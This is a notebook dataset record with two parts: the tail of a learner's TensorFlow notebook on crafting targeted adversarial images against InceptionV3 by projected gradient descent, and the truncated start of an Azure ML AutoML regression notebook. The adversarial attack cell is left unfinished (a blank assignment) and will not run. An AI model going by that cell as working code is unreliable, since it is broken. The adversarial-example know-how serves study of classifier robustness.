activation_70[0][0] \n__________________________________________________________________________________________________\nconv2d_75 (Conv2D) (None, 8, 8, 192) 331776 activation_74[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_71 (BatchNo (None, 8, 8, 320) 960 conv2d_71[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_75 (BatchNo (None, 8, 8, 192) 576 conv2d_75[0][0] \n__________________________________________________________________________________________________\nactivation_71 (Activation) (None, 8, 8, 320) 0 batch_normalization_71[0][0] \n__________________________________________________________________________________________________\nactivation_75 (Activation) (None, 8, 8, 192) 0 batch_normalization_75[0][0] \n__________________________________________________________________________________________________\nmax_pooling2d_3 (MaxPooling2D) (None, 8, 8, 768) 0 mixed7[0][0] \n__________________________________________________________________________________________________\nmixed8 (Concatenate) (None, 8, 8, 1280) 0 activation_71[0][0] \n activation_75[0][0] \n max_pooling2d_3[0][0] \n__________________________________________________________________________________________________\nconv2d_80 (Conv2D) (None, 8, 8, 448) 573440 mixed8[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_80 (BatchNo (None, 8, 8, 448) 1344 conv2d_80[0][0] \n__________________________________________________________________________________________________\nactivation_80 (Activation) (None, 8, 8, 448) 0 batch_normalization_80[0][0] \n__________________________________________________________________________________________________\nconv2d_77 (Conv2D) (None, 8, 8, 384) 491520 mixed8[0][0] \n__________________________________________________________________________________________________\nconv2d_81 (Conv2D) (None, 8, 8, 384) 1548288 activation_80[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_77 (BatchNo (None, 8, 8, 384) 1152 conv2d_77[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_81 (BatchNo (None, 8, 8, 384) 1152 conv2d_81[0][0] \n__________________________________________________________________________________________________\nactivation_77 (Activation) (None, 8, 8, 384) 0 batch_normalization_77[0][0] \n__________________________________________________________________________________________________\nactivation_81 (Activation) (None, 8, 8, 384) 0 batch_normalization_81[0][0] \n__________________________________________________________________________________________________\nconv2d_78 (Conv2D) (None, 8, 8, 384) 442368 activation_77[0][0] \n__________________________________________________________________________________________________\nconv2d_79 (Conv2D) (None, 8, 8, 384) 442368 activation_77[0][0] \n__________________________________________________________________________________________________\nconv2d_82 (Conv2D) (None, 8, 8, 384) 442368 activation_81[0][0] \n__________________________________________________________________________________________________\nconv2d_83 (Conv2D) (None, 8, 8, 384) 442368 activation_81[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d_7 (AveragePoo (None, 8, 8, 1280) 0 mixed8[0][0] \n__________________________________________________________________________________________________\nconv2d_76 (Conv2D) (None, 8, 8, 320) 409600 mixed8[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_78 (BatchNo (None, 8, 8, 384) 1152 conv2d_78[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_79 (BatchNo (None, 8, 8, 384) 1152 conv2d_79[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_82 (BatchNo (None, 8, 8, 384) 1152 conv2d_82[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_83 (BatchNo (None, 8, 8, 384) 1152 conv2d_83[0][0] \n__________________________________________________________________________________________________\nconv2d_84 (Conv2D) (None, 8, 8, 192) 245760 average_pooling2d_7[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_76 (BatchNo (None, 8, 8, 320) 960 conv2d_76[0][0] \n__________________________________________________________________________________________________\nactivation_78 (Activation) (None, 8, 8, 384) 0 batch_normalization_78[0][0] \n__________________________________________________________________________________________________\nactivation_79 (Activation) (None, 8, 8, 384) 0 batch_normalization_79[0][0] \n__________________________________________________________________________________________________\nactivation_82 (Activation) (None, 8, 8, 384) 0 batch_normalization_82[0][0] \n__________________________________________________________________________________________________\nactivation_83 (Activation) (None, 8, 8, 384) 0 batch_normalization_83[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_84 (BatchNo (None, 8, 8, 192) 576 conv2d_84[0][0] \n__________________________________________________________________________________________________\nactivation_76 (Activation) (None, 8, 8, 320) 0 batch_normalization_76[0][0] \n__________________________________________________________________________________________________\nmixed9_0 (Concatenate) (None, 8, 8, 768) 0 activation_78[0][0] \n activation_79[0][0] \n__________________________________________________________________________________________________\nconcatenate (Concatenate) (None, 8, 8, 768) 0 activation_82[0][0] \n activation_83[0][0] \n__________________________________________________________________________________________________\nactivation_84 (Activation) (None, 8, 8, 192) 0 batch_normalization_84[0][0] \n__________________________________________________________________________________________________\nmixed9 (Concatenate) (None, 8, 8, 2048) 0 activation_76[0][0] \n mixed9_0[0][0] \n concatenate[0][0] \n activation_84[0][0] \n__________________________________________________________________________________________________\nconv2d_89 (Conv2D) (None, 8, 8, 448) 917504 mixed9[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_89 (BatchNo (None, 8, 8, 448) 1344 conv2d_89[0][0] \n__________________________________________________________________________________________________\nactivation_89 (Activation) (None, 8, 8, 448) 0 batch_normalization_89[0][0] \n__________________________________________________________________________________________________\nconv2d_86 (Conv2D) (None, 8, 8, 384) 786432 mixed9[0][0] \n__________________________________________________________________________________________________\nconv2d_90 (Conv2D) (None, 8, 8, 384) 1548288 activation_89[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_86 (BatchNo (None, 8, 8, 384) 1152 conv2d_86[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_90 (BatchNo (None, 8, 8, 384) 1152 conv2d_90[0][0] \n__________________________________________________________________________________________________\nactivation_86 (Activation) (None, 8, 8, 384) 0 batch_normalization_86[0][0] \n__________________________________________________________________________________________________\nactivation_90 (Activation) (None, 8, 8, 384) 0 batch_normalization_90[0][0] \n__________________________________________________________________________________________________\nconv2d_87 (Conv2D) (None, 8, 8, 384) 442368 activation_86[0][0] \n__________________________________________________________________________________________________\nconv2d_88 (Conv2D) (None, 8, 8, 384) 442368 activation_86[0][0] \n__________________________________________________________________________________________________\nconv2d_91 (Conv2D) (None, 8, 8, 384) 442368 activation_90[0][0] \n__________________________________________________________________________________________________\nconv2d_92 (Conv2D) (None, 8, 8, 384) 442368 activation_90[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d_8 (AveragePoo (None, 8, 8, 2048) 0 mixed9[0][0] \n__________________________________________________________________________________________________\nconv2d_85 (Conv2D) (None, 8, 8, 320) 655360 mixed9[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_87 (BatchNo (None, 8, 8, 384) 1152 conv2d_87[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_88 (BatchNo (None, 8, 8, 384) 1152 conv2d_88[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_91 (BatchNo (None, 8, 8, 384) 1152 conv2d_91[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_92 (BatchNo (None, 8, 8, 384) 1152 conv2d_92[0][0] \n__________________________________________________________________________________________________\nconv2d_93 (Conv2D) (None, 8, 8, 192) 393216 average_pooling2d_8[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_85 (BatchNo (None, 8, 8, 320) 960 conv2d_85[0][0] \n__________________________________________________________________________________________________\nactivation_87 (Activation) (None, 8, 8, 384) 0 batch_normalization_87[0][0] \n__________________________________________________________________________________________________\nactivation_88 (Activation) (None, 8, 8, 384) 0 batch_normalization_88[0][0] \n__________________________________________________________________________________________________\nactivation_91 (Activation) (None, 8, 8, 384) 0 batch_normalization_91[0][0] \n__________________________________________________________________________________________________\nactivation_92 (Activation) (None, 8, 8, 384) 0 batch_normalization_92[0][0] \n__________________________________________________________________________________________________\nbatch_normalization_93 (BatchNo (None, 8, 8, 192) 576 conv2d_93[0][0] \n__________________________________________________________________________________________________\nactivation_85 (Activation) (None, 8, 8, 320) 0 batch_normalization_85[0][0] \n__________________________________________________________________________________________________\nmixed9_1 (Concatenate) (None, 8, 8, 768) 0 activation_87[0][0] \n activation_88[0][0] \n__________________________________________________________________________________________________\nconcatenate_1 (Concatenate) (None, 8, 8, 768) 0 activation_91[0][0] \n activation_92[0][0] \n__________________________________________________________________________________________________\nactivation_93 (Activation) (None, 8, 8, 192) 0 batch_normalization_93[0][0] \n__________________________________________________________________________________________________\nmixed10 (Concatenate) (None, 8, 8, 2048) 0 activation_85[0][0] \n mixed9_1[0][0] \n concatenate_1[0][0] \n activation_93[0][0] \n__________________________________________________________________________________________________\navg_pool (GlobalAveragePooling2 (None, 2048) 0 mixed10[0][0] \n__________________________________________________________________________________________________\npredictions (Dense) (None, 1000) 2049000 avg_pool[0][0] \n==================================================================================================\n" ] ], [ [ "We need to find a way to make the weigths of `inception_model` constant, instead of `tf.Variable`, otherwise, we cannot train for an adversarial attack.", "_____no_output_____" ] ], [ [ "def non_dunder(obj, strict=False):\n if strict:\n prefix = \"_\"\n else:\n prefix = \"__\"\n return [s for s in dir(obj) if not s.startswith(prefix)]", "_____no_output_____" ], [ "non_dunder(inception_model, True)", "_____no_output_____" ] ], [ [ "help(inception_model.stop_training)", "_____no_output_____" ] ], [ [ "inception_model.trainable", "_____no_output_____" ], [ "inception_model.trainable = False\ninception_model.trainable", "_____no_output_____" ], [ "inception_model.trainable_weights, inception_model.trainable_variables", "_____no_output_____" ], [ "inception_model.layers", "_____no_output_____" ], [ "inception_model.layers[0].input.shape", "_____no_output_____" ], [ "image = tf.Variable(tf.zeros((1, 299, 299, 3)))", "_____no_output_____" ] ], [ [ "adversarial_model = keras.Model(\n inputs=image,\n outputs=inception_model(image),\n)", "_____no_output_____" ], [ "ValueError: Input tensors to a Functional must come from `tf.keras.Input`. Received: <tf.Variable 'Variable:0'>", "_____no_output_____" ] ], [ [ "How should we solve this question?", "_____no_output_____" ], [ "Note that although we cannot make a model using `tf.Variable` as input,\nwe can make `image` input of `inception_model`.", "_____no_output_____" ] ], [ [ "inception_model(image)", "_____no_output_____" ], [ "import json\nfrom pathlib import Path\nfrom urllib.request import urlretrieve", "_____no_output_____" ], [ "imagenet_json = Path(\"imagenet.json\")\nif not imagenet_json.exists():\n imagenet_json, _ = urlretrieve(\n 'https://www.anishathalye.com/media/2017/07/25/imagenet.json'\n )\n\nwith open(imagenet_json) as f:\n imagenet_labels = json.load(f)\nimagenet_labels", "_____no_output_____" ], [ "len(imagenet_labels)", "_____no_output_____" ] ], [ [ "## Example image\n\nWe load our example image and make sure it's classified correctly.", "_____no_output_____" ] ], [ [ "import numpy as np\nimport PIL", "_____no_output_____" ], [ "img_path = Path(\"cat.jpg\")\nif not img_path.exists():\n img_path, _ = urlretrieve('https://www.anishathalye.com/media/2017/07/25/cat.jpg')\nimg_class = 281\nimagenet_labels[img_class]", "_____no_output_____" ], [ "img = PIL.Image.open(img_path)\nbig_dim = max(img.width, img.height)\nwide = img.width > img.height\nnew_w = 299 if not wide else int(img.width * 299 / img.height)\nnew_h = 299 if wide else int(img.height * 299 / img.width)\nimg = img.resize((new_w, new_h)).crop((0, 0, 299, 299))\nimg = (np.asarray(img) / 255.0).astype(np.float32)\nimg.shape", "_____no_output_____" ], [ "np.random.rand(7)[[1,3,5]]", "_____no_output_____" ] ], [ [ "list(range(7))[[1,3,5]]", "_____no_output_____" ], [ "TypeError: list indices must be integers or slices, not list", "_____no_output_____" ] ], [ [ "It seems that `tf.Tensor`, like `list`, cannot access its subarray in this manner.", "_____no_output_____" ] ], [ [ "p = inception_model(np.expand_dims(img, axis=0))[0]\np.shape", "_____no_output_____" ] ], [ [ "p[[1,3,4]]", "_____no_output_____" ], [ "InvalidArgumentError: Index out of range using input dim 1; input has only 1 dims [Op:StridedSlice] name: strided_slice/", "_____no_output_____" ] ], [ [ "p.numpy()[[1,3,4]]", "_____no_output_____" ], [ "def classify(img, correct_class=None, target_class=None):\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(10, 8))\n fig.sca(ax1) # sca() Select Current Axis\n p = inception_model(np.expand_dims(img, axis=0))[0]\n p = p.numpy()\n print(f\"type(p) = {type(p)}, len(p) = {len(p)}\")\n ax1.imshow(img)\n #fig.sca(ax1) # Why should there be two fig.sca(ax1)?\n \n # display the top 10 prediceted classes\n #topk = list(p.argsort()[-10:][::-1])\n #topk = list(tf.argsort(p)[-10:][::-1])\n topk = list((tf.argsort(p)[-10:][::-1]).numpy())\n print(f\"topk = {topk}\")\n topprobs = p[topk]\n barlist = ax2.bar(range(10), topprobs)\n if target_class in topk:\n barlist[topk.index(target_class)].set_color('r')\n if correct_class in topk:\n barlist[topk.index(correct_class)].set_color('g')\n plt.sca(ax2)\n plt.ylim([0, 1.1])\n plt.xticks(range(10),\n [imagenet_labels[i][:15] for i in topk],\n rotation='vertical')\n # :15 means \"taking the first 15 characters\" for fear of long-string class.\n fig.subplots_adjust(bottom=0.2)\n plt.show()", "_____no_output_____" ] ], [ [ "help(np.expand_dims)", "_____no_output_____" ] ], [ [ "**(?)** What is the `new_w, new_h, resize()` all about?<br>\n**(R)** The story was that Anish wanted to `crop((0,0,299,299))`, i.e. crop the `299x299` subimage for the upper left corner for each image. But the reality is that _**not every image has both width and height larger than**_ `299`. So the `resize((new_w, new_h))` was there to guarantee this. Indeed,\n\\begin{align}\n h_{\\text{new}} = 299,\\; w_{\\text{new}} = h_{\\text{new}} \\frac{w}{h} \\quad\\text{when}\\quad h < w \\\\\n w_{\\text{new}} = 299,\\; h_{\\text{new}} = w_{\\text{new}} \\frac{h}{w} \\quad\\text{when}\\quad h \\ge w\n\\end{align}\n\nwhich converted into words says **_always convert the shorter side to_** `299` and **_the longer side to its rightful length according to the original ratio_**.", "_____no_output_____" ] ], [ [ "%matplotlib inline\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl", "_____no_output_____" ], [ "mpl.rc('axes', labelsize=14)\nmpl.rc('xtick', labelsize=12)\nmpl.rc('ytick', labelsize=12)\n\nDARK_READER = True\nif DARK_READER:\n plt.rcParams.update({\n \"lines.color\": \"white\",\n \"patch.edgecolor\": \"white\",\n \"text.color\": \"black\",\n \"axes.facecolor\": \"black\",\n \"axes.edgecolor\": \"lightgray\",\n \"axes.labelcolor\": \"white\",\n \"axes.titlecolor\": \"white\",\n \"xtick.color\": \"white\",\n \"ytick.color\": \"white\",\n \"grid.color\": \"lightgray\",\n \"figure.facecolor\": \"black\",\n \"figure.edgecolor\": \"black\",\n \"savefig.facecolor\": \"black\",\n \"savefig.edgecolor\": \"black\",\n })", "_____no_output_____" ], [ "classify(img, correct_class=img_class)", "type(p) = <class 'numpy.ndarray'>, len(p) = 1000\ntopk = [281, 282, 285, 840, 287, 728, 753, 478, 738, 15]\n" ] ], [ [ "# Adversarial examples\n\nGiven an image $\\mathbf{x}$, our neural network outputs a probability distribution over labels, $P(y \\mid \\mathbf{x})$. When we craft an adversarial input, we want to find an $\\hat{\\mathbf{x}}$ where $\\log P(\\hat{y} \\mid \\hat{\\mathbf{x}})$ is maximized for a target label $\\hat{y}$: that way, our input will be misclassified as the target class. We can ensure that $\\hat{\\mathbf{x}}$ doesn't look too different from the original $\\mathbf{x}$ by constraining ourselves to some $\\ell_\\infty$ <del>box</del> ball with radius $\\epsilon$, requiring that $\\left\\lVert \\mathbf{x} - \\hat{\\mathbf{x}} \\right\\rVert_\\infty \\le \\epsilon$.\n\nIn this framework, an adversarial example is the solution to a constrained optimization problem that we can solve using [backpropagation](https://colah.github.io/posts/2015-08-Backprop/) and projected gradient descent, basically the same techniques that are used to train networks themselves. The algorithm is simple:\n\nWe begin by initializing our adversarial example as $\\hat{\\mathbf{x}} \\leftarrow \\mathbf{x}$. Then, we repeat the following until convergence:\n\n1. $\\hat{\\mathbf{x}} \\leftarrow \\hat{\\mathbf{x}} + \\alpha \\cdot \\nabla \\log P(\\hat{y} \\mid \\hat{\\mathbf{x}})$\n2. $\\hat{\\mathbf{x}} \\leftarrow \\mathrm{clip}(\\hat{\\mathbf{x}}, \\mathbf{x} - \\epsilon, \\mathbf{x} + \\epsilon)$", "_____no_output_____" ] ], [ [ "demo_epsilon = 2.0/255.0 # a really small perturbation\ndemo_lr = 1e-1\ndemo_steps = 100\ndemo_target = 924 # \"guacamole\"\n# Test other target classes at your own will\ndemo_target = imagenet_labels.index(\"pizza, pizza pie\")\n\n\n# initialization step\n#sess.run(assign_op, feed_dict={x: img})\nx_hat = image\n\n# projected gradient descent\nfor i in tqdm(range(demo_steps)):\n ## gradient descent step\n #_, loss_value = sess.run(\n # [optim_step, loss],\n # feed_dict={learning_rate: demo_lr, y_hat: demo_target})\n ## project step\n #sess.run(project_step, feed_dict={x: img, epsilon: demo_epsilon})\n with tf.GradientTape() as tape:\n log_likelihood = \n if (i+1) % 10 == 0:\n print('step %d, loss=%g' % (i+1, loss_value))", "_____no_output_____" ] ], [ [ "## Continue in `v2.ipynb`\nI would like to wrap `p = inception_model(np.expand_dims(img, axis=0))[0]` inside another function named `inception()` (we might have to replace `np.expand_dims()` by `tf.expand_dims()`)", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "raw", "code", "raw", "markdown", "code", "markdown", "code", "raw", "markdown", "code", "raw", "code", "raw", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "raw" ], [ "code", "code", "code", "code", "code", "code" ], [ "raw", "raw" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "raw", "raw" ], [ "markdown" ], [ "code" ], [ "raw", "raw" ], [ "code", "code" ], [ "raw" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e730c092c8a6900598fd883c9bac0424b9bbc48e
36,976
ipynb
Jupyter Notebook
how-to-use-azureml/automated-machine-learning/regression-explanation-featurization/auto-ml-regression-explanation-featurization.ipynb
jpe316/MachineLearningNotebooks
5201f1bce01c9ba6f13a0be49c2b4761d0f6918e
[ "MIT" ]
1
2020-04-26T23:43:44.000Z
2020-04-26T23:43:44.000Z
how-to-use-azureml/automated-machine-learning/regression-explanation-featurization/auto-ml-regression-explanation-featurization.ipynb
jpe316/MachineLearningNotebooks
5201f1bce01c9ba6f13a0be49c2b4761d0f6918e
[ "MIT" ]
null
null
null
how-to-use-azureml/automated-machine-learning/regression-explanation-featurization/auto-ml-regression-explanation-featurization.ipynb
jpe316/MachineLearningNotebooks
5201f1bce01c9ba6f13a0be49c2b4761d0f6918e
[ "MIT" ]
null
null
null
38.922105
422
0.576536
[ [ [ "Copyright (c) Microsoft Corporation. All rights reserved.\n\nLicensed under the MIT License.", "_____no_output_____" ], [ "![Impressions](https://PixelServer20190423114238.azurewebsites.net/api/impressions/MachineLearningNotebooks/how-to-use-azureml/automated-machine-learning/regression-car-price-model-explaination-and-featurization/auto-ml-regression.png)", "_____no_output_____" ], [ "# Automated Machine Learning\n_**Regression with Aml Compute**_\n\n## Contents\n1. [Introduction](#Introduction)\n1. [Setup](#Setup)\n1. [Data](#Data)\n1. [Train](#Train)\n1. [Results](#Results)\n1. [Test](#Test)\n", "_____no_output_____" ], [ "## Introduction\nIn this example we use the Hardware Performance Dataset to showcase how you can use AutoML for a simple regression problem. The Regression goal is to predict the performance of certain combinations of hardware parts.\nAfter training AutoML models for this regression data set, we show how you can compute model explanations on your remote compute using a sample explainer script.\n\nIf you are using an Azure Machine Learning Notebook VM, you are all set. Otherwise, go through the [configuration](../../../configuration.ipynb) notebook first if you haven't already to establish your connection to the AzureML Workspace. \n\nAn Enterprise workspace is required for this notebook. To learn more about creating an Enterprise workspace or upgrading to an Enterprise workspace from the Azure portal, please visit our [Workspace page.](https://docs.microsoft.com/azure/machine-learning/service/concept-workspace#upgrade) \n\nIn this notebook you will learn how to:\n1. Create an `Experiment` in an existing `Workspace`.\n2. Instantiating AutoMLConfig with FeaturizationConfig for customization\n3. Train the model using remote compute.\n4. Explore the results and featurization transparency options\n5. Setup remote compute for computing the model explanations for a given AutoML model.\n6. Start an AzureML experiment on your remote compute to compute explanations for an AutoML model.\n7. Download the feature importance for engineered features and visualize the explanations for engineered features on azure portal. \n8. Download the feature importance for raw features and visualize the explanations for raw features on azure portal. \n", "_____no_output_____" ], [ "## Setup\n\nAs part of the setup you have already created an Azure ML `Workspace` object. For Automated ML you will need to create an `Experiment` object, which is a named object in a `Workspace` used to run experiments.", "_____no_output_____" ] ], [ [ "import logging\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nimport azureml.core\nfrom azureml.core.experiment import Experiment\nfrom azureml.core.workspace import Workspace\nimport azureml.dataprep as dprep\nfrom azureml.automl.core.featurization import FeaturizationConfig\nfrom azureml.train.automl import AutoMLConfig\nfrom azureml.core.dataset import Dataset", "_____no_output_____" ] ], [ [ "This sample notebook may use features that are not available in previous versions of the Azure ML SDK.", "_____no_output_____" ] ], [ [ "print(\"This notebook was created using version 1.3.0 of the Azure ML SDK\")\nprint(\"You are currently using version\", azureml.core.VERSION, \"of the Azure ML SDK\")", "_____no_output_____" ], [ "ws = Workspace.from_config()\n\n# Choose a name for the experiment.\nexperiment_name = 'automl-regression-hardware-explain'\nexperiment = Experiment(ws, experiment_name)\n\noutput = {}\noutput['Subscription ID'] = ws.subscription_id\noutput['Workspace Name'] = ws.name\noutput['Resource Group'] = ws.resource_group\noutput['Location'] = ws.location\noutput['Experiment Name'] = experiment.name\npd.set_option('display.max_colwidth', -1)\noutputDf = pd.DataFrame(data = output, index = [''])\noutputDf.T", "_____no_output_____" ] ], [ [ "### Create or Attach existing AmlCompute\nYou will need to create a [compute target](https://docs.microsoft.com/azure/machine-learning/service/concept-azure-machine-learning-architecture#compute-target) for your AutoML run. In this tutorial, you create `AmlCompute` as your training compute resource.\n\n**Creation of AmlCompute takes approximately 5 minutes.** If the AmlCompute with that name is already in your workspace this code will skip the creation process.\n\nAs with other Azure services, there are limits on certain resources (e.g. AmlCompute) associated with the Azure Machine Learning service. Please read [this article](https://docs.microsoft.com/en-us/azure/machine-learning/service/how-to-manage-quotas) on the default limits and how to request more quota.", "_____no_output_____" ] ], [ [ "from azureml.core.compute import ComputeTarget, AmlCompute\nfrom azureml.core.compute_target import ComputeTargetException\n\n# Choose a name for your cluster.\namlcompute_cluster_name = \"hardware-cluster\"\n\n# Verify that cluster does not exist already\ntry:\n compute_target = ComputeTarget(workspace=ws, name=amlcompute_cluster_name)\n print('Found existing cluster, use it.')\nexcept ComputeTargetException:\n compute_config = AmlCompute.provisioning_configuration(vm_size='STANDARD_D2_V2',\n max_nodes=4)\n compute_target = ComputeTarget.create(ws, amlcompute_cluster_name, compute_config)\n\ncompute_target.wait_for_completion(show_output=True)", "_____no_output_____" ] ], [ [ "### Setup Training and Test Data for AutoML experiment\n\nLoad the hardware dataset from a csv file containing both training features and labels. The features are inputs to the model, while the training labels represent the expected output of the model. Next, we'll split the data using random_split and extract the training data for the model. We also register the datasets in your workspace using a name so that these datasets may be accessed from the remote compute.", "_____no_output_____" ] ], [ [ "data = 'https://automlsamplenotebookdata.blob.core.windows.net/automl-sample-notebook-data/machineData.csv'\n\ndataset = Dataset.Tabular.from_delimited_files(data)\n\n# Split the dataset into train and test datasets\ntrain_data, test_data = dataset.random_split(percentage=0.8, seed=223)\n\n\n# Register the train dataset with your workspace\ntrain_data.register(workspace = ws, name = 'machineData_train_dataset',\n description = 'hardware performance training data',\n create_new_version=True)\n\n# Register the test dataset with your workspace\ntest_data.register(workspace = ws, name = 'machineData_test_dataset', description = 'hardware performance test data', create_new_version=True)\n\nlabel =\"ERP\"\n\ntrain_data.to_pandas_dataframe().head()", "_____no_output_____" ] ], [ [ "## Train\n\nInstantiate an `AutoMLConfig` object to specify the settings and data used to run the experiment.\n\n|Property|Description|\n|-|-|\n|**task**|classification, regression or forecasting|\n|**primary_metric**|This is the metric that you want to optimize. Regression supports the following primary metrics: <br><i>spearman_correlation</i><br><i>normalized_root_mean_squared_error</i><br><i>r2_score</i><br><i>normalized_mean_absolute_error</i>|\n|**experiment_timeout_hours**| Maximum amount of time in hours that all iterations combined can take before the experiment terminates.|\n|**enable_early_stopping**| Flag to enble early termination if the score is not improving in the short term.|\n|**featurization**| 'auto' / 'off' / FeaturizationConfig Indicator for whether featurization step should be done automatically or not, or whether customized featurization should be used. Setting this enables AutoML to perform featurization on the input to handle *missing data*, and to perform some common *feature extraction*. Note: If the input data is sparse, featurization cannot be turned on.|\n|**n_cross_validations**|Number of cross validation splits.|\n|**training_data**|(sparse) array-like, shape = [n_samples, n_features]|\n|**label_column_name**|(sparse) array-like, shape = [n_samples, ], targets values.|", "_____no_output_____" ], [ "## Customization\n\nThis step requires an Enterprise workspace to gain access to this feature. To learn more about creating an Enterprise workspace or upgrading to an Enterprise workspace from the Azure portal, please visit our [Workspace page.](https://docs.microsoft.com/azure/machine-learning/service/concept-workspace#upgrade). \n\nSupported customization includes:\n1. Column purpose update: Override feature type for the specified column.\n2. Transformer parameter update: Update parameters for the specified transformer. Currently supports Imputer and HashOneHotEncoder.\n3. Drop columns: Columns to drop from being featurized.\n4. Block transformers: Allow/Block transformers to be used on featurization process.", "_____no_output_____" ], [ "Create FeaturizationConfig object using API calls", "_____no_output_____" ] ], [ [ "featurization_config = FeaturizationConfig()\nfeaturization_config.blocked_transformers = ['LabelEncoder']\n#featurization_config.drop_columns = ['MMIN']\nfeaturization_config.add_column_purpose('MYCT', 'Numeric')\nfeaturization_config.add_column_purpose('VendorName', 'CategoricalHash')\n#default strategy mean, add transformer param for for 3 columns\nfeaturization_config.add_transformer_params('Imputer', ['CACH'], {\"strategy\": \"median\"})\nfeaturization_config.add_transformer_params('Imputer', ['CHMIN'], {\"strategy\": \"median\"})\nfeaturization_config.add_transformer_params('Imputer', ['PRP'], {\"strategy\": \"most_frequent\"})\n#featurization_config.add_transformer_params('HashOneHotEncoder', [], {\"number_of_bits\": 3})", "_____no_output_____" ], [ "automl_settings = {\n \"enable_early_stopping\": True, \n \"experiment_timeout_hours\" : 0.25,\n \"max_concurrent_iterations\": 4,\n \"max_cores_per_iteration\": -1,\n \"n_cross_validations\": 5,\n \"primary_metric\": 'normalized_root_mean_squared_error',\n \"verbosity\": logging.INFO\n}\n\nautoml_config = AutoMLConfig(task = 'regression',\n debug_log = 'automl_errors.log',\n compute_target=compute_target,\n featurization=featurization_config,\n training_data = train_data,\n label_column_name = label,\n **automl_settings\n )", "_____no_output_____" ] ], [ [ "Call the `submit` method on the experiment object and pass the run configuration. Execution of local runs is synchronous. Depending on the data and the number of iterations this can run for a while.\nIn this example, we specify `show_output = True` to print currently running iterations to the console.", "_____no_output_____" ] ], [ [ "remote_run = experiment.submit(automl_config, show_output = False)", "_____no_output_____" ], [ "remote_run", "_____no_output_____" ] ], [ [ "Run the following cell to access previous runs. Uncomment the cell below and update the run_id.", "_____no_output_____" ] ], [ [ "#from azureml.train.automl.run import AutoMLRun\n#remote_run = AutoMLRun(experiment=experiment, run_id='<run_ID_goes_here')\n#remote_run", "_____no_output_____" ], [ "remote_run.wait_for_completion()", "_____no_output_____" ], [ "best_run, fitted_model = remote_run.get_output()", "_____no_output_____" ], [ "best_run_customized, fitted_model_customized = remote_run.get_output()", "_____no_output_____" ] ], [ [ "## Transparency\n\nView updated featurization summary", "_____no_output_____" ] ], [ [ "custom_featurizer = fitted_model_customized.named_steps['datatransformer']", "_____no_output_____" ], [ "custom_featurizer.get_featurization_summary()", "_____no_output_____" ] ], [ [ "is_user_friendly=False allows for more detailed summary for transforms being applied", "_____no_output_____" ] ], [ [ "custom_featurizer.get_featurization_summary(is_user_friendly=False)", "_____no_output_____" ], [ "custom_featurizer.get_stats_feature_type_summary()", "_____no_output_____" ] ], [ [ "## Results", "_____no_output_____" ], [ "#### Widget for Monitoring Runs\n\nThe widget will first report a \"loading\" status while running the first iteration. After completing the first iteration, an auto-updating graph and table will be shown. The widget will refresh once per minute, so you should see the graph update as child runs complete.\n\n**Note:** The widget displays a link at the bottom. Use this link to open a web interface to explore the individual run details", "_____no_output_____" ] ], [ [ "from azureml.widgets import RunDetails\nRunDetails(remote_run).show() ", "_____no_output_____" ] ], [ [ "## Explanations\nThis step requires an Enterprise workspace to gain access to this feature. To learn more about creating an Enterprise workspace or upgrading to an Enterprise workspace from the Azure portal, please visit our [Workspace page.](https://docs.microsoft.com/azure/machine-learning/service/concept-workspace#upgrade). \nThis section will walk you through the workflow to compute model explanations for an AutoML model on your remote compute.\n\n### Retrieve any AutoML Model for explanations\n\nBelow we select the some AutoML pipeline from our iterations. The `get_output` method returns the a AutoML run and the fitted model for the last invocation. Overloads on `get_output` allow you to retrieve the best run and fitted model for *any* logged metric or for a particular *iteration*.", "_____no_output_____" ] ], [ [ "automl_run, fitted_model = remote_run.get_output(metric='r2_score')", "_____no_output_____" ] ], [ [ "### Setup model explanation run on the remote compute\nThe following section provides details on how to setup an AzureML experiment to run model explanations for an AutoML model on your remote compute.", "_____no_output_____" ], [ "#### Sample script used for computing explanations\nView the sample script for computing the model explanations for your AutoML model on remote compute.", "_____no_output_____" ] ], [ [ "with open('train_explainer.py', 'r') as cefr:\n print(cefr.read())", "_____no_output_____" ] ], [ [ "#### Substitute values in your sample script\nThe following cell shows how you change the values in the sample script so that you can change the sample script according to your experiment and dataset.", "_____no_output_____" ] ], [ [ "import shutil\nimport os\n\n# create script folder\nscript_folder = './sample_projects/automl-regression-hardware'\nif not os.path.exists(script_folder):\n os.makedirs(script_folder)\n\n# Copy the sample script to script folder.\nshutil.copy('train_explainer.py', script_folder)\n\n# Create the explainer script that will run on the remote compute.\nscript_file_name = script_folder + '/train_explainer.py'\n\n# Open the sample script for modification\nwith open(script_file_name, 'r') as cefr:\n content = cefr.read()\n\n# Replace the values in train_explainer.py file with the appropriate values\ncontent = content.replace('<<experiment_name>>', automl_run.experiment.name) # your experiment name.\ncontent = content.replace('<<run_id>>', automl_run.id) # Run-id of the AutoML run for which you want to explain the model.\ncontent = content.replace('<<target_column_name>>', 'ERP') # Your target column name\ncontent = content.replace('<<task>>', 